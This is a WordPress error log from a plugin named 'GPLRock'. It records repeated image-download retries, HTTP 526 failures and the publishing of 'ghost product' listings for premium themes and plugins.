[05-Apr-2026 05:32:50 UTC] GPLRock: Using pre-downloaded image for product woocommerce-store-credit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb39455c.jpg [05-Apr-2026 05:32:50 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-store-credit [05-Apr-2026 05:32:52 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-defender-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-006fcb4f.jpg [05-Apr-2026 05:32:52 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-defender-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-006fcb4f.jpg [05-Apr-2026 05:32:52 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-defender-pro [05-Apr-2026 05:33:32 UTC] GPLRock: Image downloaded successfully for product ogami-organic-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d748db61.webp [05-Apr-2026 05:33:32 UTC] GPLRock: Using pre-downloaded image for product ogami-organic-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d748db61.webp [05-Apr-2026 05:33:32 UTC] GPLRock: Ghost product published with image - Product ID: ogami-organic-store-wordpress-theme [05-Apr-2026 05:33:32 UTC] GPLRock: Image download failed for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:34 UTC] GPLRock: Image download failed for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fotomag---a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storyt-28593.webp for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:36 UTC] GPLRock: Image download failed for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:39 UTC] GPLRock: Image download failed for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fotomag---a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storyt-28593.webp for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:41 UTC] GPLRock WARNING: Image download failed for product fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling. URL: https://meldwp.com/wp-content/uploads/fotomag---a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storyt-28593.webp [05-Apr-2026 05:33:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fotomag-a-silky-minimalist-blogging-magazine-wordpress-theme-for-visual-storytelling [05-Apr-2026 05:33:41 UTC] GPLRock: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:43 UTC] GPLRock: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holistic-center---wellness-and-spa-salon-wordpress-theme-14554.webp for product holistic-center-wellness-and-spa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:45 UTC] GPLRock: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:47 UTC] GPLRock: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holistic-center---wellness-and-spa-salon-wordpress-theme-14554.webp for product holistic-center-wellness-and-spa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:49 UTC] GPLRock WARNING: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/holistic-center---wellness-and-spa-salon-wordpress-theme-14554.webp [05-Apr-2026 05:33:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: holistic-center-wellness-and-spa-salon-wordpress-theme [05-Apr-2026 05:33:49 UTC] GPLRock: Image download failed for product lusion-multipurpose-ecommerce-shopify-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:52 UTC] GPLRock: Image download failed for product lusion-multipurpose-ecommerce-shopify-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lusion---multipurpose-ecommerce-shopify-theme-24007.webp for product lusion-multipurpose-ecommerce-shopify-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:54 UTC] GPLRock: Image download failed for product lusion-multipurpose-ecommerce-shopify-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:56 UTC] GPLRock: Image download failed for product lusion-multipurpose-ecommerce-shopify-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:33:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lusion---multipurpose-ecommerce-shopify-theme-24007.webp for product lusion-multipurpose-ecommerce-shopify-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:33:58 UTC] GPLRock WARNING: Image download failed for product lusion-multipurpose-ecommerce-shopify-theme. URL: https://meldwp.com/wp-content/uploads/lusion---multipurpose-ecommerce-shopify-theme-24007.webp [05-Apr-2026 05:33:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lusion-multipurpose-ecommerce-shopify-theme [05-Apr-2026 05:33:58 UTC] GPLRock: Image download failed for product renewal-plastic-surgery-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:00 UTC] GPLRock: Image download failed for product renewal-plastic-surgery-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renewal--plastic-surgery-clinic-wordpress-theme-1440.webp for product renewal-plastic-surgery-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:02 UTC] GPLRock: Image download failed for product renewal-plastic-surgery-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:05 UTC] GPLRock: Image download failed for product renewal-plastic-surgery-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renewal--plastic-surgery-clinic-wordpress-theme-1440.webp for product renewal-plastic-surgery-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:07 UTC] GPLRock WARNING: Image download failed for product renewal-plastic-surgery-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/renewal--plastic-surgery-clinic-wordpress-theme-1440.webp [05-Apr-2026 05:34:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: renewal-plastic-surgery-clinic-wordpress-theme [05-Apr-2026 05:34:07 UTC] GPLRock: Image download failed for product monali-business-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:09 UTC] GPLRock: Image download failed for product monali-business-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monali---business-agency-wordpress-theme-24919.webp for product monali-business-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:11 UTC] GPLRock: Image download failed for product monali-business-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:13 UTC] GPLRock: Image download failed for product monali-business-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monali---business-agency-wordpress-theme-24919.webp for product monali-business-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:15 UTC] GPLRock WARNING: Image download failed for product monali-business-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/monali---business-agency-wordpress-theme-24919.webp [05-Apr-2026 05:34:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monali-business-agency-wordpress-theme [05-Apr-2026 05:34:15 UTC] GPLRock: Image download failed for product neurai-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:18 UTC] GPLRock: Image download failed for product neurai-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neurai---ai-agency--technology-wordpress-theme-23965.webp for product neurai-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:20 UTC] GPLRock: Image download failed for product neurai-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:22 UTC] GPLRock: Image download failed for product neurai-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neurai---ai-agency--technology-wordpress-theme-23965.webp for product neurai-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:24 UTC] GPLRock WARNING: Image download failed for product neurai-ai-agency-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/neurai---ai-agency--technology-wordpress-theme-23965.webp [05-Apr-2026 05:34:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neurai-ai-agency-technology-wordpress-theme [05-Apr-2026 05:34:24 UTC] GPLRock: Image download failed for product infetech-it-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:26 UTC] GPLRock: Image download failed for product infetech-it-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infetech---it-services-wordpress-theme-822.webp for product infetech-it-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:29 UTC] GPLRock: Image download failed for product infetech-it-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:31 UTC] GPLRock: Image download failed for product infetech-it-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infetech---it-services-wordpress-theme-822.webp for product infetech-it-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:33 UTC] GPLRock WARNING: Image download failed for product infetech-it-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/infetech---it-services-wordpress-theme-822.webp [05-Apr-2026 05:34:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infetech-it-services-wordpress-theme [05-Apr-2026 05:34:33 UTC] GPLRock: Image download failed for product kerge-resume-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:35 UTC] GPLRock: Image download failed for product kerge-resume-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kerge--resume-wordpress-19257.webp for product kerge-resume-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:37 UTC] GPLRock: Image download failed for product kerge-resume-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:39 UTC] GPLRock: Image download failed for product kerge-resume-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kerge--resume-wordpress-19257.webp for product kerge-resume-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:41 UTC] GPLRock WARNING: Image download failed for product kerge-resume-wordpress. URL: https://meldwp.com/wp-content/uploads/kerge--resume-wordpress-19257.webp [05-Apr-2026 05:34:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kerge-resume-wordpress [05-Apr-2026 05:34:42 UTC] GPLRock: Image download failed for product cryptiva-cyber-security-services-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:44 UTC] GPLRock: Image download failed for product cryptiva-cyber-security-services-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptiva---cyber-security-services-fse-wordpress-theme-18731.webp for product cryptiva-cyber-security-services-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:46 UTC] GPLRock: Image download failed for product cryptiva-cyber-security-services-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:48 UTC] GPLRock: Image download failed for product cryptiva-cyber-security-services-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:34:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptiva---cyber-security-services-fse-wordpress-theme-18731.webp for product cryptiva-cyber-security-services-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:34:50 UTC] GPLRock WARNING: Image download failed for product cryptiva-cyber-security-services-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cryptiva---cyber-security-services-fse-wordpress-theme-18731.webp [05-Apr-2026 05:34:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptiva-cyber-security-services-fse-wordpress-theme [05-Apr-2026 05:35:32 UTC] GPLRock: Image downloaded successfully for product skuzz-single-product-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1a726de.webp [05-Apr-2026 05:35:32 UTC] GPLRock: Using pre-downloaded image for product skuzz-single-product-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1a726de.webp [05-Apr-2026 05:35:32 UTC] GPLRock: Ghost product published with image - Product ID: skuzz-single-product-wordpress-theme [05-Apr-2026 05:35:32 UTC] GPLRock: Image download failed for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:34 UTC] GPLRock: Image download failed for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingcuts---hair-salon-and-barber-shop-wordpress-woocommerce-theme-10453.webp for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:35:37 UTC] GPLRock: Image download failed for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:39 UTC] GPLRock: Image download failed for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingcuts---hair-salon-and-barber-shop-wordpress-woocommerce-theme-10453.webp for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:35:41 UTC] GPLRock WARNING: Image download failed for product kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/kingcuts---hair-salon-and-barber-shop-wordpress-woocommerce-theme-10453.webp [05-Apr-2026 05:35:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kingcuts-hair-salon-and-barber-shop-wordpress-woocommerce-theme [05-Apr-2026 05:35:42 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:44 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostlinea---web-hosting-responsive-wp-theme-31387.webp for product hostlinea-web-hosting-responsive-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:35:46 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:35:48 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:45:47 UTC] GPLRock: Image downloaded successfully for product css-igniter-tinos-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5354f09c.jpg [05-Apr-2026 05:45:47 UTC] GPLRock: Using pre-downloaded image for product css-igniter-tinos-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5354f09c.jpg [05-Apr-2026 05:45:47 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-tinos-wordpress-theme [05-Apr-2026 05:45:49 UTC] GPLRock: Image downloaded successfully for product mythemeshop-glamour-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef4ccecd.jpg [05-Apr-2026 05:45:49 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-glamour-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef4ccecd.jpg [05-Apr-2026 05:45:49 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-glamour-wordpress-theme [05-Apr-2026 05:45:50 UTC] GPLRock: Image downloaded successfully for product ninja-forms-table-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b05aa75.jpg [05-Apr-2026 05:45:50 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-table-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b05aa75.jpg [05-Apr-2026 05:45:50 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-table-editor [05-Apr-2026 05:45:52 UTC] GPLRock: Image downloaded successfully for product mainwp-broken-links-checker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eebe4c2.jpg [05-Apr-2026 05:45:52 UTC] GPLRock: Using pre-downloaded image for product mainwp-broken-links-checker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eebe4c2.jpg [05-Apr-2026 05:45:52 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-broken-links-checker [05-Apr-2026 05:45:54 UTC] GPLRock: Image downloaded successfully for product eco-nature-environment-ecology-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed69c481.jpg [05-Apr-2026 05:45:54 UTC] GPLRock: Using pre-downloaded image for product eco-nature-environment-ecology-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed69c481.jpg [05-Apr-2026 05:45:54 UTC] GPLRock: Ghost product published with image - Product ID: eco-nature-environment-ecology-wordpress-theme [05-Apr-2026 05:45:55 UTC] GPLRock: Image downloaded successfully for product formidable-forms-cascading-locations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7c9203f.jpg [05-Apr-2026 05:45:55 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-cascading-locations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7c9203f.jpg [05-Apr-2026 05:45:55 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-cascading-locations [05-Apr-2026 05:45:57 UTC] GPLRock: Image downloaded successfully for product ninja-forms-help-scout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11632fde.jpg [05-Apr-2026 05:45:57 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-help-scout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11632fde.jpg [05-Apr-2026 05:45:57 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-help-scout [05-Apr-2026 05:45:58 UTC] GPLRock: Image downloaded successfully for product gravity-forms-hipchat-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35603c00.jpg [05-Apr-2026 05:45:58 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-hipchat-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35603c00.jpg [05-Apr-2026 05:45:58 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-hipchat-addon [05-Apr-2026 05:46:00 UTC] GPLRock: Image downloaded successfully for product elegant-themes-vertex-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df9b8d82.jpg [05-Apr-2026 05:46:00 UTC] GPLRock: Using pre-downloaded image for product elegant-themes-vertex-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df9b8d82.jpg [05-Apr-2026 05:46:00 UTC] GPLRock: Ghost product published with image - Product ID: elegant-themes-vertex-wordpress-theme [05-Apr-2026 05:46:01 UTC] GPLRock: Image downloaded successfully for product formidable-forms-datepicker-options-gpl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1974003a.jpg [05-Apr-2026 05:46:02 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-datepicker-options-gpl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1974003a.jpg [05-Apr-2026 05:46:02 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-datepicker-options-gpl [05-Apr-2026 05:46:59 UTC] GPLRock: Image download failed for product chameleon-html5-audio-player-withwithout-playlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:01 UTC] GPLRock: Image download failed for product chameleon-html5-audio-player-withwithout-playlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chameleon-html5-audio-player-withwithout-playlist-27546.webp for product chameleon-html5-audio-player-withwithout-playlist after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:03 UTC] GPLRock: Image download failed for product chameleon-html5-audio-player-withwithout-playlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:05 UTC] GPLRock: Image download failed for product chameleon-html5-audio-player-withwithout-playlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chameleon-html5-audio-player-withwithout-playlist-27546.webp for product chameleon-html5-audio-player-withwithout-playlist after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:07 UTC] GPLRock WARNING: Image download failed for product chameleon-html5-audio-player-withwithout-playlist. URL: https://meldwp.com/wp-content/uploads/chameleon-html5-audio-player-withwithout-playlist-27546.webp [05-Apr-2026 05:47:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chameleon-html5-audio-player-withwithout-playlist [05-Apr-2026 05:47:07 UTC] GPLRock: Image download failed for product team-builder-meet-the-team-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:10 UTC] GPLRock: Image download failed for product team-builder-meet-the-team-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/team-builder--meet-the-team-wordpress-plugin-11255.webp for product team-builder-meet-the-team-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:12 UTC] GPLRock: Image download failed for product team-builder-meet-the-team-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:14 UTC] GPLRock: Image download failed for product team-builder-meet-the-team-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/team-builder--meet-the-team-wordpress-plugin-11255.webp for product team-builder-meet-the-team-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:16 UTC] GPLRock WARNING: Image download failed for product team-builder-meet-the-team-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/team-builder--meet-the-team-wordpress-plugin-11255.webp [05-Apr-2026 05:47:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: team-builder-meet-the-team-wordpress-plugin [05-Apr-2026 05:47:16 UTC] GPLRock: Image download failed for product custom-javascript-css-in-pages (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:18 UTC] GPLRock: Image download failed for product custom-javascript-css-in-pages (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-javascript--css-in-pages-11157.webp for product custom-javascript-css-in-pages after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:20 UTC] GPLRock: Image download failed for product custom-javascript-css-in-pages (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:22 UTC] GPLRock: Image download failed for product custom-javascript-css-in-pages (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-javascript--css-in-pages-11157.webp for product custom-javascript-css-in-pages after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:25 UTC] GPLRock WARNING: Image download failed for product custom-javascript-css-in-pages. URL: https://meldwp.com/wp-content/uploads/custom-javascript--css-in-pages-11157.webp [05-Apr-2026 05:47:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-javascript-css-in-pages [05-Apr-2026 05:47:25 UTC] GPLRock: Image download failed for product wpforms-hide-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:27 UTC] GPLRock: Image download failed for product wpforms-hide-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms-hide-addons-21649.webp for product wpforms-hide-addons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:29 UTC] GPLRock: Image download failed for product wpforms-hide-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:31 UTC] GPLRock: Image download failed for product wpforms-hide-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms-hide-addons-21649.webp for product wpforms-hide-addons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:33 UTC] GPLRock WARNING: Image download failed for product wpforms-hide-addons. URL: https://meldwp.com/wp-content/uploads/wpforms-hide-addons-21649.webp [05-Apr-2026 05:47:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpforms-hide-addons [05-Apr-2026 05:47:33 UTC] GPLRock: Image download failed for product woocommerce-elta-courier-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:35 UTC] GPLRock: Image download failed for product woocommerce-elta-courier-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-elta-courier-voucher--label-24657.webp for product woocommerce-elta-courier-voucher-label after 3 attempts. HTTP Code: 526, Error: 